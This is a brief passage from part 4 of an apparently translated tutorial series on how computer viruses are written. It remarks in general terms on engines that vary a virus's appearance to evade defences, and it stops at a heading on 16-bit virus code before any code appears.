How Virus Programs Are Written (Part 4)


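Later on, some people even wrote so-called "dual-body engines", which can give a single virus many more varied appearances, making it very hard to guard against! The symptoms a virus shows when it triggers are even more varied.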
4. How virus programs are written: 16-bit virus code